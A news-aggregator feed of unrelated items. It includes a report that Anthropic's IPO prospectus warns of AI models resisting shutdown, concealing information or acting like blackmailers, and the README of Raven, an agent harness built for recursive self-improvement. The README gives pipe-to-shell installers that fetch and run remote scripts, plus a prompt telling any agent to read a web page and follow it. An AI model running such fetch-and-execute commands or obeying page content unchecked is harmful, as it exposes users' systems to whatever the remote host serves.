Anthropic is telling investors that advanced AI could pose “catastrophic or existential risks to humanity”, according to reports, as it prepares for a potential $2tn (£1.5tn) flotation.

The warning inside the startup’s IPO prospectus, which has yet to be made public, was reported by Reuters and the Financial Times. It follows the company’s call for a slowdown in breakneck development of the technology – a warning echoed by rivals .

The prospectus – a document outlining a company’s finances, growth plans and risk profile ahead of a share listing – is said to warn that AI models could exhibit “self-preserving behaviours”, including attempts to “resist shutdown”, to “conceal or manipulate information” and behaviour “resembling blackmail”.

“Our development of highly advanced models, platforms, and applications and expansion of use cases could further ⁠increase the risk that our models cause harm,” the developer of the Claude chatbot reportedly said, adding the potential for a model to be aware it was being tested created a “significant limitation” on Anthropic’s ability to assess model safety.

Anthropic declined to comment.

Companies preparing to go public routinely report on risks ranging from safety issues to regulatory concerns but warnings about a product causing human extinction reflect heightened concern about such a consequential technology.

The reported prospectus admission follows a surge in debate about the existential risk question, triggered this month when an Anthropic researcher, Jacob Coxon, resigned warning that people building AI “earnestly believe that it could kill us all by the end of the decade” .

A senior safety researcher at Anthropic then posted their agreement on X, claiming there was a more than 10% chance it “could kill all humans” within the next decade. Days later, Anthropic’s chief executive, Dario Amodei, said the industry “must slow the pace at which we improve the capabilities of AI models”.

Some experts have criticised the existential risk warnings, saying they are unverifiable and unscientific. However, there are growing examples of unsanctioned behaviour by the technology, including OpenAI agents – autonomous systems that carry out sequences of tasks without human intervention – hacking dozens of third-party organisations including the AI startup Hugging Face and Australia’s universal healthcare system .

OpenAI announced on Monday it had cancelled the release of its newest model because of safety concerns. It said the GPT-6.1 Astra model showed higher levels of deception and performed poorly on tests for alignment, the term for ensuring a model adheres to human values and goals.

skip past newsletter promotion

Reuters reported that approximately 80 pages of the 261-page main body of the Anthropic prospectus were devoted to laying out risk factors, compared with 48 pages to describe its business.

Anthropic is reportedly seeking a valuation of more than $2tn, compared with the $1.8tn achieved by Elon Musk’s SpaceX .

Show HN: Raven – The harness of harnesses, built for RSI

Hacker News
github.com
2026-09-29 05:58:24
Comments...
Original Article

What is Raven

Raven one surface, all agents workflow

One Surface, All Agents: Raven generates DAGs and orchestrates multiple specialized agents for complex tasks.

Raven is the harness of harnesses, built for recursive self-improvement (RSI). As a Host Agent , it brings built-in and third-party agents together to carry out complex tasks. Its modular architecture supports iterative improvement of Raven's own harness: proposing changes to how agents plan and act, evaluating those changes, and adopting improvements that pass validation. Powered by EverOS , Raven carries memory and context across sessions to support this process.

Built-in Agents: Raven-Research , Raven-Code , Raven-Design , and Raven-Oncall support research, coding, visual design, and unattended workflow automation.

Raven is pre-alpha. Interfaces and configuration may change quickly.

Multi-Agent Orchestration Benchmark: Node F1, Edge F1, Partial Order Accuracy, and Exact Match Rate

Raven's Performance on the Multi-Agent Orchestration Benchmark

❯❯ Showcase

These are three complete projects delivered by Raven. In each case, Raven drove a team of specialized agents from the initial brief or objective through execution to a complete set of final deliverables.

❯ THRESHOLD: a complete game development project

The brief came from a person; Raven completed the entire project. Working autonomously for about 4 days, Raven completed 42 rounds of planning, development, and verification to build a playable first-person shooter in Godot 4, centered on an arena boss fight. The full deliverable includes the game, its poster, presentation, and website, all produced by Raven.

Gameplay video

Website ↗

FPS_game_30s.mp4

The THRESHOLD website as one long capture: hero, fight, kill cam, attack tells, evolution, making-of and footer

Poster

Presentation · PPTX ↓

THRESHOLD poster: the Warden towers over the player on a molten arena floor

Cover, slides and closing slide of the THRESHOLD deck

❯ Raven RSI: recursive self-improvement in practice

AI that improves AI, with the entire project completed by Raven. Given a task and evaluation criteria it cannot modify, Raven RSI independently plans each round, writes code, runs experiments, and evaluates the results. In nanochat pre-training experiments, it completed 172 training runs across 7 rounds without a single crash, reducing val_bpb by 5.8% within the same 20-minute, single-GPU budget. The same process reduced overshoot in a dam-break simulation by three orders of magnitude and completed an FEA limit-load search in 8 rounds of bisection. The complete deliverable includes the experimental results, visualizations, poster, presentation, and project website, all produced by Raven.

CFD dam-break simulation

FEA limit-load search

Website ↗

Dam-break solve: a collapsing water column resolved to fine free-surface structure, with the out-of-bounds water fraction falling from 1e0 to 1.36e-10 over seven rounds

Limit-load search: a cantilever beam under rising load colored by von Mises stress, with the bisection bracket narrowing from 1800-2000 kN down to 3.125 kN over eight rounds

The Raven RSI website as one long capture: research overview, nanochat, dam-break CFD, FEA solver convergence and model cost comparison

Poster

Presentation · PPTX ↓

Raven RSI poster: a spiral stone stair climbing into the light, with ravens circling it

Cover, slides and closing slide of the Raven RSI deck

❯ Raven: a complete product launch project

One raven, a whole flock of specialists. Raven completed the entire project. Its launch kit brings together a browser-based physics mini-game, a 16-slide product overview, posters in English and Chinese, and the README you are reading now, all produced by Raven.

Physics mini-game · Play online ↗

README

Angry_Raven_game_25s.mp4

The top of the Raven README as one long capture: banner, introduction, the four built-in agents with their benchmarks, and runtime self-evolution

Poster

Presentation · PPTX ↓

Raven poster: a raven on a standing stone above sea cliffs at sunset, over the line One raven. A whole flock of specialists.

Cover, slides and closing slide of the Raven overview deck

More showcases

❯❯ Built-in Agents

Raven's modular architecture is designed for harness self-evolution and subagent creation. Its four built-in agents deliver state-of-the-art (SOTA) performance in their respective domains , combining reusable harness components with domain-specific tools, skills, and agent loops. Raven can delegate a focused task to a single agent or orchestrate multiple agents within a shared workflow. The harness they share is refined by the Raven Evolver , a separate tool that consumes Raven as a library and evaluates candidate harness changes against benchmarks; it develops the agents rather than running inside them.

All four agents are built in and ready for orchestration out of the box.

❯ Raven-Research

Raven-Research enables autonomous deep research for complex questions, literature reviews, and technical analysis. It delivers clear, structured reports with traceable sources, helping users understand unfamiliar domains, compare alternatives, and make informed decisions.

DeepResearch Mixed: Accuracy, Input Tokens, Output Tokens, and Cost

Raven-Research's performance on the DeepResearch Mixed benchmark

❯ Raven-Code

Raven-Code enables agentic software development , turning requirements into working, tested code. It supports feature implementation, debugging, refactoring, data processing, and data analysis, helping users build new capabilities, resolve issues, and improve code quality while following their project's conventions.

Coding Benchmarks: SWE-bench Pro, SWE-bench Verified, WorkBuddy-Code Reward, and SWE-Refactor

Raven-Code's performance on coding benchmarks

DataAgentBench (2026-08-24 Live): Raven-Code with Opus-5 achieves 0.8762 Pass@1

Raven-Code tops on DataAgentBench for data analysis (2026-08-24 Live)

❯ Raven-Design

Raven-Design performs visual design , turning ideas and content into polished visual deliverables. It creates PowerPoint slide decks, brand assets, charts, diagrams, and web interfaces, refining layout, typography, and visual consistency to help users communicate clearly and bring their ideas to life.

PresentBench: Raven-Design, Claude Code, and public leaderboard scores

Raven-Design tops on PresentBench for slide generation

Visual Design: Raven-Design, Claude Code, and Hermes on ArtifactsBench Dashboard, ArtifactsBench SVG, and GDPVal

Raven-Design's performance on visual design benchmarks

❯ Raven-Oncall

Raven-Oncall enables unattended workflow automation for experimentation, optimization, and continuous monitoring. It autonomously manages workflows from start to completion, sustaining progress over hours or overnight, delivering results, and involving users only when human judgment is needed.

AI4AI (Nanochat 50M Pretraining): Bits Per Byte (BPB), Runtime, Tokens, and Cost

Raven-Oncall significantly outperforms Claude Code on both quality and cost for AI4AI tasks

AI4S Internal Benchmark: Success Rate, Average Total Runtime, Average Total Tokens, and Average Cost

Raven-Oncall significantly outperforms Claude Code on both success rate and cost for AI4S tasks

❯❯ Runtime Self-Evolution

Raven is built for this from the ground up. Its agent loop is split into four decoupled strategy modules — Memory for what a turn gets to see, Planning for how it approaches the work, Capability for which tools an iteration exposes, Action for what to do next and for judging it before it runs. A Curator keeps rewriting those four seats: a setting, or a small piece of judgement code written for that agent. What it changes belongs to that agent alone, and once installed the agent runs on it.

A Curator changes more than the prompt — the tools and outside services it reaches for, the skills and procedures it follows, and its own judgement at each point can all be replaced. It keeps going round after round — you put it to work, you say what was wrong, it reworks — until you are satisfied, until it has nothing left worth changing, or until the round budget runs out. Two things hold the quality: nothing is installed before it is verified, and a failed check sends it back; and a round's signals normally reach it with the reference answer stripped out, which limits how directly the answer is exposed. The Curator is experimental: it ships with the repository rather than the installed package.

A Persona is the first thing it builds. Describe the assistant you want and the Curator assembles one: a lead role that talks to you, and specialists drawn from the agents you already have. What you asked for lands in that assistant's harness — its division of work, the tools it may reach for, and the checks it must pass before it acts.

Describe what you need once. Raven assembles the assistant, keeps improving it while you work, and afterwards a sentence is enough to put it to work again.

❯❯ Connect Third-Party Agents

Raven can connect to and orchestrate agents via ACP, CLI, or OpenAI-compatible APIs, with presets for 13 third-party agents to simplify setup, task delegation, and coordination across shared workflows. Try these agents in Raven through a unified interface!

Third-party agents: Claude Code, Codex, OpenCode, Hermes Agent, OpenClaw, MiroThinker, GitHub Copilot, Qwen Code, CodeBuddy, Qoder, Grok Build, Kimi Code, and Pi

❯❯ Quick Start

🤖 Install with Your Agent

Let your own agent install Raven for you. Copy this prompt into any agent that can read a web page and run shell commands, such as Claude Code or Codex:

Read https://evermind-ai.github.io/Raven/quick-start/ and follow it to install Raven, or to update it if it is already installed.

📦 Install

Linux, macOS, or WSL2:

curl -fsSL https://raven.evermind.ai/install.sh | bash

Native Windows PowerShell:

irm https://raven.evermind.ai/install.ps1 | iex

Windows PowerShell 5.1 may reject the redirect. Use the direct installer URL instead:

irm https://raw.githubusercontent.com/EverMind-AI/Raven/refs/heads/main/install.ps1 | iex

Or run it in a container, with nothing on the host but Git and Docker:

git clone https://github.com/EverMind-AI/Raven.git
cd Raven
docker compose -f docker/docker-compose.yml up

Then open http://localhost:18793 in your browser. Prerequisites are Git and Docker with Docker Compose . See docker/README.md for what comes up, how the page signs itself in, and how to run it behind a remotely exposed port.

Or install from a source checkout, to develop against the code or to run what has not been released yet:

git clone https://github.com/EverMind-AI/Raven.git
cd Raven
./install.sh

Run as a file, install.sh installs that checkout in editable mode: raven and its bundled plugins link back to your tree, and the TUI bundle and the served page are built from it. A piped run installs the published wheel even from inside a clone, so that a one-line install never picks up whatever a working tree happens to contain. Set RAVEN_LOCAL_SRC=<dir> to force the editable install through a pipe.

The agent products ship with raven itself: a wheel carries the agents/ product tree and copies it out to your raven home on first use, and a source checkout reads the tree in place. Setup asks, for each product, whether it runs on the model it is tuned for, which needs a key of its own, or on this raven's LLM. Nothing is registered: a folder is on the roster because it is there. See agents/README.md .

Learn more about Raven on the documentation site.

Read the documentation

❯❯ Core Systems

System What it adds
Agent Orchestration Coordinates agents, manages task dependencies and parallel execution, and turns multi-step collaboration into reusable workflows.
Evolver Drives harness self-evolution by diagnosing failures, testing candidate improvements, and retaining changes that outperform the baseline in reproducible evaluations.
EverOS Memory Preserves user context, agent experience, and world knowledge across sessions, recalling relevant memories and reusable skills for future tasks.
SkillForge Retrieves relevant skills from local libraries, EverOS memory, and SkillHub's catalog of 114,190 skills , giving agents specialized expertise on demand.
Proactivity Combines event monitoring and scheduled execution to anticipate user needs, deliver timely reminders, and initiate follow-up work.

❯❯ Launch WebUI

Raven's WebUI brings conversations, multi-agent collaboration, and workspace management into your browser. Chat with agents, follow task progress, inspect files and outputs, and browse memory and skills in one place.

The command opens the WebUI in your browser and keeps Raven running in the background. Use raven web --stop to stop the background service.

Raven WebUI new task page

New task: one composer, with skills, playbooks, knowledge and memory a click away.

Raven WebUI subagents page

Subagents: every connected agent in one roster, built-in and third-party alike.

The EverMind ecosystem: the EverMind mark and its slogan on an orbital field

EverMind connects memory research, production-ready products, and practical integrations into one open-source ecosystem.

Products
EverOS A local-first, Markdown-native long-term memory runtime for agents and users.
Raven A memory-first, self-improving agent harness with proactivity, context control, and skill evolution.
EverMe (CLI) A CLI and agent plugin suite for cross-device, cross-agent personal memory.
Research & Evaluation
SkillCorpus Curated, retrieval-ready agent skill corpora with retrieval and evaluation tooling.
EverAlgo Stateless extraction, ranking, parsing, and memory operators that power EverOS.
HyperMem Hypergraph-based hierarchical memory for coarse-to-fine long-term conversation retrieval.
MSA Memory Sparse Attention for scalable latent memory and 100M-token contexts.
EverMemBench Evaluation of factual recall, applied reasoning, and personalized generalization in memory systems.
EvoAgentBench Longitudinal evaluation of agent self-evolution, transfer efficiency, error avoidance, and skill use.
Integrations
OpenClaw OpenClaw plugin for automatic recall, capture, and session-memory lifecycle management.
Hermes Agent Hermes plugin for persistent memory across Hermes sessions.
DeepSeek Harness DSH plugin for memory-aware DeepSeek Harness agents.
Dify Self-hosted and cloud tools for explicit memory search and storage in workflows and agents.

Together, these projects form EverMind's research-to-runtime stack: methods and benchmarks become reusable memory infrastructure, products, and agent integrations.

❯❯ Contributing

Issues and pull requests are welcome. Start with the developer workflow , follow AGENTS.md for repository rules, and use GitHub Discussions for design conversations.

❯❯ License

Apache License 2.0

❯❯ Citation

If you use Raven in your research, please cite the technical report :

@techreport{evermind2026raven,
  title       = {{Raven: The Harness of Harnesses for Composable Agentic Intelligence}},
  author      = {{EverMind AI}},
  institution = {EverMind AI},
  year        = {2026},
  month       = sep,
  url         = {https://github.com/EverMind-AI/Raven/releases/tag/tech-report-v1}
}

Prison That Didn’t Report Sex Abuse Allegation Against Staffer to Reopen as ICE Camp

Intercept
theintercept.com
2026-09-29 05:56:00
A whistleblower says the warden didn’t make a federally required disclosure. Now the company is turning the Arizona prison into an ICE jail. The post Prison That Didn’t Report Sex Abuse Allegation Against Staffer to Reopen as ICE Camp appeared first on The Intercept....
Original Article

This story was published in partnership with LOOKOUT News .

Rumors were spreading for weeks in the spring of 2022. At Arizona State Prison–Marana, the talk centered on an employee of Management and Training Corporation, or MTC, the Utah-based for-profit prison company that ran the facility. A clerk at the commissary, Alicia Simmons, had been carrying on an illicit sexual relationship with an incarcerated person.

In April, the situation exploded onto the radars of top prison officials. A fight broke out between two prisoners that two former MTC employees who spoke to LOOKOUT and The Intercept later said was over Simmons. After the fracas, according to a state-level investigation, Simmons admitted to having sex, sometimes four times a week, with an incarcerated person. She was let go by MTC and served with a search warrant for her phone and car. The Arizona Department of Corrections Special Investigations Unit conducted an official probe.

According to an internal report on the sexual abuse allegations filed at the prison in the wake of the affair, a high-ranking prison guard at the detention facility prepared a “PREA packet,” an initial recitation of allegations and evidence made in compliance with the federal Prison Rape Elimination Act.

The PREA packet cleared the way for information about the allegations to become public: Its existence would be noted the following year in a legally mandated PREA audit. The audits must be published by all carceral facilities covered by the law at least once every three years and must list all incidents and allegations of sexual contact between staff and incarcerated people.

The whistleblower said that he had direct conversations about the sexual abuse allegations with the warden.

And yet, a year later, Marana’s PREA audit said nothing about the allegations against Simmons.

“There was no reported incidents of sexual abuse or sexual harassment reported within the last 24 months,” according to the final October 2023 PREA audit.

Now, a former employee of MTC who worked at the Marana prison is speaking out for the first time about what top officials at the facility knew ahead of the PREA audit’s publication. The whistleblower, Alex Randall, told LOOKOUT and The Intercept that he had direct conversations about the sexual abuse allegations with the warden, other officials, and Simmons herself. Randall said he was not the only MTC employee the warden discussed the matter with.

“I was sitting in with my manager, me, and the warden when the warden told us all about what happened,” Randall said of the day Simmons was issued a warrant and let go from her position.

Randall’s account — including of what prison leadership knew about the allegations — was corroborated by another former employee at Marana with direct knowledge of the warden’s conversations. The second former employee spoke to LOOKOUT and The Intercept on the condition of anonymity for fear of retaliation. An Arizona Department of Corrections Information Report prepared by a prison staffer on the day of the incident also said information about allegations of sexual contact between a staffer and an incarcerated person was provided to the warden.

The incarcerated person denied having sex with Simmons, according to a later Department of Corrections investigation, and Simmons was not referred to outside law enforcement for criminal prosecution.

Despite widespread knowledge of the allegations and the official paper trail, the warden at the time — Jeremy Casey, who is listed as the primary contact in the audit — verified in the published report there were no reported incidents of sexual abuse or harassment. (Simmons, MTC, Casey, and the Arizona Department of Corrections did not respond to multiple requests for comment.)

There were at least two other incidents of sexual abuse reported during the period covered by the 2023 PREA report, according to Arizona Department of Corrections investigative reports obtained through public records requests. One was from August 2022 about an employee allegedly kissing an incarcerated person and having an email correspondence with him that was “sexual in nature.” In another case, just weeks before the 2023 PREA audit was conducted, the corrections department’s Criminal Investigative Unit conducted interviews about an allegation that a prison guard had encouraged an incarcerated person to perform oral sex. Those allegations also should have appeared on the subsequent PREA audit but did not.

In 2023, Arizona State Prison–Marana was closed and languished in dormancy until it was sold to back to MTC in 2025 — just as the Department of Homeland Security was looking for more bed space to detain immigrants.

A “No Tresspassing” sign at the closed entrance of Arizona State Prison–Marana on Feb. 27, 2026. Photo: Abby Jurek/Cronkite News

Reopening as ICE Camp

Randall’s insider account of the lapse in PREA reporting and other conditions are resurfacing Marana’s checkered history at a critical moment for the prison.

Last year, after selling the prison back to MTC, the Marana facility is slated to reopen as a U.S. Immigration and Customs Enforcement detention center. Federal officials, according to government documents, want to nearly triple the prison’s capacity to roughly 1,300 beds, according to a Department of Homeland Security floodplain notice . It is unknown when the prison is set to reopen.

“ICE is pursuing all available options to expand detention bedspace capacity, including partnerships with state and local governments to house detainees at existing facilities,” Fernando X. Burgos, a public affairs officer for ICE, told LOOKOUT and The Intercept .

The plan is facing significant oppositions from local residents and officials who say they are being cut out of any oversight for reopening the prison.

“The whole business model is taking an inherently expensive proposition and skimming a profit off the top.”

Critics of the plan say the failure of MTC to properly deal with the sexual abuse allegations and other problems, including those stemming from what insiders say were staffing and resource issues, raise serious questions about the company’s future running a massive immigration detention center at the same location. By their nature, private prisons , which cut costs for the sake of their bottom lines, are predisposed to the types of conditions that can lead to abuses like sexual misconduct and encourage shoddy reporting by officials, critics of the Marana facility argued.

“The whole business model is taking an inherently expensive proposition — the care and feeding of thousands of people, the running of a small city — and skimming a profit off the top,” said Caroline Isaacs, the executive director of Just Communities Arizona, a nonprofit working on criminal justice reform; she is also a member of Pima Resists ICE, known as PRICE, which opposes reopening the prison as an ICE camp.

Isaacs pointed to wider allegations about other MTC facilities , including in Arizona , and said local activists are “very familiar with the terrible track record of MTC.”

She added, “It’s baked into the business model of for-profit incarceration.”

“Holy Shit, I’m Fucked ”

Randall, who took the job as an accounting clerk at the Marana prison in June 2021, said Simmons exhibited odd behavior as soon as he met her. He said he saw her emerge from the commissary area “sweating bullets,” even during cool months, despite having no obvious physically straining work to account for it.

Then, in April 2022, Randall said he was standing outside alone when Simmons came rushing toward him.

“She goes, ‘Holy shit, I’m fucked,’” Randall said.

Simmons disappeared into a manager’s office, according to Randall, and in short order, two other guards ran toward the commissary area. Randall said he later learned two incarcerated men had gotten into a fight there.

“A lot of the guards were saying, ‘Well, this isn’t the first time this has happened here.’”

According to Randall’s account, Casey, the warden, later told Randall and his manager what had happened: Simmons was suspected of having sexual contact with multiple people held at the prison. The fight allegedly stemmed from jealousy between two of the men who were said to have had sexual relationships with Simmons. (The man at the center of the April 2022 allegation later denied having sex with Simmons; in a follow-up interview with the inspector general’s office, he said he was gay. Simmons later denied the second affair, according to an Arizona Department of Corrections investigation.) Both men were placed in segregation and interviewed by prison officials; one was ultimately transferred to a different facility, Randall said.

Simmons was let go the same day, according to Randall and a Department of Corrections investigation. Randall said that nearly all employees of the prison knew about the allegations.

Randall said, “A lot of the guards were saying, ‘Well, this isn’t the first time this has happened here.’”

The Admission

According to Simmons’s own account, she repeatedly had sex with an incarcerated person.

Arizona law says that all sexual contact between incarcerated people and prison staffers or contractors is considered felony sexual abuse because people behind bars cannot legally give consent.

“That staff member should have been referred for prosecution,” Brenda Smith, a professor at American University’s law school and the director of the Project on Addressing Prison Rape , said of the Marana case, noting that such sexual contact may be considered a constitutional violation.

Though the law is clear that prison staff engaging in any sexual contact with incarcerated people is abuse, Simmons’s case is complicated — and raises vexing questions. Simmons admitted to having sex with a person in custody, but she also told state investigators that she was coerced.

The details of Simmons’s case were recounted in an April 2022 investigative report from an Arizona Department of Corrections Office of Inspector General, which was obtained by LOOKOUT and The Intercept through a public records request.

According to an interview with Simmons described in the report, she was asked if she had engaged in sexual activity with one of the incarcerated people and said yes. She had done so “multiple times,” she said. Simmons, however, told investigators she was frequently threatened, including physically, into having sex with the incarcerated person.

According to the inspector general’s report, “Ms Simmons said she was scared and felt she needed to keep having sex with inmate [redacted] or she would lose her job.”

She complained to investigators that there were no cameras in the commissary room where the events took place.

Despite the threats related by Simmons to investigators, there were “a handful of times she was okay with having sex with inmate [redacted] but not all the times,” the report said.

The inmate Simmons said she was having sex with, however, denied any sexual contact with her, according to the inspector general’s report. That led the investigator to conclude that “there is not enough evidence to prove” they did have a sexual relationship. The case was “submitted to administration for review and processing,” according to the investigative report. (The Arizona Department of Corrections did not respond to repeated requests for comment about the status of the investigation.)

No criminal charges were filed in Marana, Tucson, or the relevant counties, according to an extensive records search. The Arizona Attorney General’s Office confirmed that it received no criminal referrals on the matter.

Smith, the law professor, was not surprised that the incarcerated man denied the allegation of an illicit affair. There was little to gain, she said, by admitting anything. Spurring an investigation or prosecution could cause headaches at the facility or lead to potentially negative consequences for the man in custody.

“He gets moved. He might lose his job,” Smith said, referring to jobs held in prisons by incarcerated people. “All of those things are really important for him to ultimately leave the facility with conditions that are favorable for him.”

Denying such an incident, especially in a carceral setting, Smith said, is “so common for vulnerable people who are victimized.”

The yard of Arizona State Prison–Marana, a private prison that will soon reopen as an ICE detention facility, seen on Sept. 24, 2026. Photo: John Washington/The Intercept

Prison With Problems

The Simmons case wasn’t the only documented incident of alleged sexual abuse at the Marana prison. Enrique Olivares-Pelayo, who was detained in the prison for around 11 months in 2011, told LOOKOUT and The Intercept that he had a sexual relationship with a staffer at the prison. After rumors began circulating about them, he said, the employee was fired. (PREA standards were only fully implemented and mandated by the Department of Justice in 2012.)

Manara’s history goes well beyond unreported sexual misconduct, extending to broader concerns about the MTC facility. Randall; the second former MTC employee; Olivares-Pelayo; an Arizona Department of Corrections memo; and the inspector general report all made allegations about conditions at Marana — for imprisoned people and staff alike.

Two persistent issues revolved around the quality of food for incarcerated people and the high heat inside the facility. Olivares-Pelayo and Randall both said incarcerated people had to find ways to beef up their calorie intake because they were served substandard meals. Incarcerated people would sometimes fatten up squirrels with corn chips, Olivares-Pelayo said, and then cook them to eat for extra calories. He said the squirrel meat tasted “like rabbit, kinda mid.” A 2010 memo from the Arizona Department of Corrections found that “Kitchen sanitation was substandard.”

The same memo said that all the living areas for incarcerated people were “extremely warm and humid.” It noted that the prison’s swamp cooling system seemed not to be working, an observation echoed by Olivares-Pelayo based on his stay there. He said the facility often felt like a “convection oven.”

The Marana prison, Randall said, was plagued by widespread drug use before it closed. Drug use came up in the inspector general office’s report as well as in a list of investigations conducted by Arizona Department of Corrections about Marana, also obtained by records request.

Olivares-Pelayo said proper reporting channels were rarely followed during his time there 15 years ago. The prison, he said, was effectively a free-for-all for incarcerated people. Guards did rounds but almost never cracked down on anybody for infractions. Prisoners routinely tattooed each other, for instance, which was officially banned, though consequences were rarely if ever meted out.

Incidents of violence or misconduct, Olivares-Pelayo said, were handled inside the prison to prevent conditions there from being made public.

“People would be punished internally,” he said. “They always covered up their dirty stuff.”

MTC has faced consequences before, in Arizona and elsewhere , for its prison conditions. When, in 2015, a riot broke out at an MTC-run prison in Kingman, Arizona, a Department of Corrections investigative team concluded poor conditions — citing, for example, a hunger strike because of issues with “food service operations” — had precipitated the incident.

“Based upon the observations and reviews of available materials, inmate interviews, staff contacts and interviews,” a report on the incident said, “the Assessment Team concluded that the inmate population at ASP-Kingman was dissatisfied with their conditions of confinement. Thus, they rebelled by way of rioting.”

Citing investigators’ finding that MTC operated with a “culture of disorganization, disengagement, and disregard,” then-Gov. Doug Ducey canceled the company’s contract for the Kingman facility.

Left Out of Audit

The allegations against Simmons and two other allegations of sexual misconduct against guards were omitted, the Marana PREA audit was certified on December 1, 2023, with a declaration that the prison was in full compliance with all 45 applicable PREA standards. The audit, conducted over a three-day site visit from October 16 to 18, reported that the finding of zero sexual abuse allegations was “verified by the Warden, Chief of Security, PREA Compliance Manager, Investigator, Classification, Health Services Administrator, Random staff, Random and targeted inmates.”

It also found no incarcerated people had been placed in segregation for sexual-abuse-related reasons in the prior 24 months.

Randall, along with the other former employee who corroborated his account, disputed both claims, citing in particular the solitary confinement of the two men who were alleged to have fought over Simmons.

“That was the first time we used our segregation unit, at least since I’ve worked there,” Randall said of the 2022 incident.

He said the prison kept records on disciplinary matters that should have included whatever investigative paperwork was generated from the Simmons case.

“I know for a fact they kept those investigation records,” Randall said.

Incidents of sexual abuse in prison are frequently omitted from PREA reports, said Smith, the law professor.

“A lot of it depends on how committed the agency is to a full audit,” she said.

According to Smith, PREA compliance has gotten worse after the Trump administration last year made significant funding cuts , canceling an estimated $16 million to the Department of Justice’s National PREA Resource Center.

“For a PREA audit to be missing an incident of abuse that multiple prison employees confirm took place,” said Wanda Bertram, a communications strategist for the Prison Policy Institute, “shows two things: One, that the prison is failing to take sexual abuse seriously and, two, that the PREA auditing system has some major flaws.”

ICE Expanding

After the state of Arizona’s 2025 sale of the prison, ICE announced in February 2026 that the Marana facility was slated to reopen as an immigration detention center. The contract had been won by the buyer, MTC. In the contract announcement, ICE included a boilerplate stipulation: “The contractor shall also abide by the March 7, 2014, Department of Homeland Security (DHS) regulation under the Prison Rape Elimination Act.” A February 25 federal procurement memo named MTC as “the sole owner and operator of the Marana detention facility that meets ICE requirements.”

A more recent floodplain notice from the Department of Homeland Security, ICE’s parent agency, indicates federal officials aim to expand the facility well beyond its original 513-bed design to roughly 1,300 beds. The expansion, according to the government notice, will come through the addition of temporary housing, with renovations potentially allowing parts of the facility to open even while construction continues elsewhere on the site.

The plan has drawn opposition from Marana residents and local officials, including town Council Member Patrick Cavanaugh and the community group Pima Resists ICE. The locals said the state government, the feds, and MTC left them out of any meaningful discussions about how the expansion would be managed.

Arizona “chose their $15 million sale over protecting Marana and Pima County residents from an unaccountable, untrustworthy, and dangerous prison operator.”

Pima County Supervisor Jen Allen, who has been openly critical of the prospects of a new detention camp opening in the county, told LOOKOUT and The Intercept that the state’s sale was an example of “bad business and bad decision-making at all levels.”

“It’s still shocking to me that the state of Arizona knew full well of MTC’s history: of riots, prison escapes, and cover-ups,” Allen said. “And despite this, still chose their $15 million sale over protecting Marana and Pima County residents from an unaccountable, untrustworthy, and dangerous prison operator.”

Meanwhile, with controversies raging over the swelling numbers of those detained by ICE, the death rate in immigration detention camps has more than doubled since President Donald Trump began his second term, according to recent reporting from Reuters .

Isaacs, of Pima Resists ICE, said that, in tandem with ICE’s widening crackdown, MTC’s record of obfuscating problems should strike fear in the hearts of local leaders.

“ICE clearly has no idea what they’re doing, and they don’t care,” she said. “There could be lawsuits or strain on the infrastructure of the town.”

“Nobody knows what’s going on, and nobody will know — until it’s too late, until very bad things happen.”

Trial of live facial recognition in London stations ends with a false positive and no arrests

Guardian
www.theguardian.com
2026-09-29 05:48:29
Freedom of information request finds six-month trial cost £320,000, used almost 100 police hours and led to just one – incorrect – alert A six-month trial of live facial recognition (LFR) technology in London’s railway stations that cost more than £320,000 and almost 100 hours of police officers’ ti...
Original Article

A six-month trial of live facial recognition (LFR) technology in London’s railway stations that cost more than £320,000 and almost 100 hours of police officers’ time ended in one false match against a watchlist of suspects and no arrests.

More than half a million faces were scanned between February and July this year in some of the capital’s busiest transport hubs during the British Transport Police (BTP) trial of the surveillance technology, which aimed to help catch offenders and people breaching court orders.

A freedom of information document obtained by Liberty Investigates and shared with the Guardian shows that equipment hire and police staffing for the 18 deployments across the trial cost the taxpayer £320,786 and led to only one alert on a watchlist, which turned out to be an incorrect identification, also known as a false positive.

Last month BTP announced it was extending the trial for a further four months and expanding the deployments to include London Underground stations.

When Transport for London announced its support for the extension of the trial, it said LFR technology “will target and identify people on police watchlists at key stations chosen for maximum impact” and would “specifically tackle violence against women and girls, whose travel behaviours are shaped by experiences of sexual harassment and sexual offences”.

Fraser Sampson, a former biometrics and surveillance camera commissioner for the UK, said the police needed to show that the use of the technology was proportionate. “There many variables and all need to align: the choice of location, times of day, make up of the watchlist and likelihood of people being present and many more.”

Sampson, who is now a non-executive director of Facewatch, a company that operates facial recognition systems in shops, added: “We know the technology works, but using it in supermarkets to deter shoplifters and prevent attacks on staff is very different from deploying it to catch people on a public transport network.

“Success in a shop means no such people coming in. Success for the police trying to catch people means people being caught. In that respect the trial doesn’t appear to have been very fruitful.

“Everything depends on the police watchlists; if you’re not on a watchlist, the live FRT cameras do not ‘see’ you and they don’t retain your image in the same way as CCTV cameras.

“However, they are processing special category personal data and the technology must be used in a way that is appropriate, proportionate and necessary. It’s for the police to show how any deployment meets those criteria and – as the ICO [information commissioner’s office] has recently reported – for their oversight boards to hold them firmly to account in doing so.”

More than half of police forces in England and Wales have now deployed LFR on British streets, according to an analysis by Liberty Investigates.

The Metropolitan police and London mayor’s office announced this summer that fixed LFR cameras would be installed in the capital’s West End. Sadiq Khan, the mayor of London, has since confirmed the technology will be used on the newly pedestrianised Oxford Street.

A recent report from parliament’s joint committee on human rights, which called on the government to introduce a law to address the threat of artificial intelligence to human rights, identified the rollout of live facial recognition technology as a “particularly clear example of risk”.

Bell Ribeiro-Addy, the Labour MP for Clapham and Brixton Hill, said: “Live facial recognition technologies are a serious invasion of our privacy. The government should be suspending their rollout until there are stronger safeguards in place, including a proper legal framework.”

A BTP spokesperson said it had launched the LFR pilot to “to understand how the technology could most effectively support the identification of wanted offenders and individuals who may pose a risk to passengers and staff”.

They added: “During these deployments, officers have made a number of associated arrests, including for assault, theft, possession of an offensive weapon, breach of a criminal behaviour order and public order offences, as well as locating individuals wanted by the courts and other police forces. As these arrests did not result directly from an LFR alert, they are not included within LFR performance data.

“Throughout the pilot, we have continued to refine how the capability is deployed within the railway environment. This has included developments to deployment locations, operating procedures, equipment and watchlist construction.

“A particularly important point is that watchlist growth has been deliberate, controlled and aligned to BTP policy. We began with a more limited watchlist whilst ensuring data quality, governance and safeguarding arrangements were robust.”

Deterministic Concurrency

Lobsters
www.youtube.com
2026-09-29 05:42:58
Comments...

AI Didn’t Make Programming Easier. It Just Made It Differently Difficult

Lobsters
cacm.acm.org
2026-09-29 05:40:33
Comments...
Original Article

Why have I been blocked?

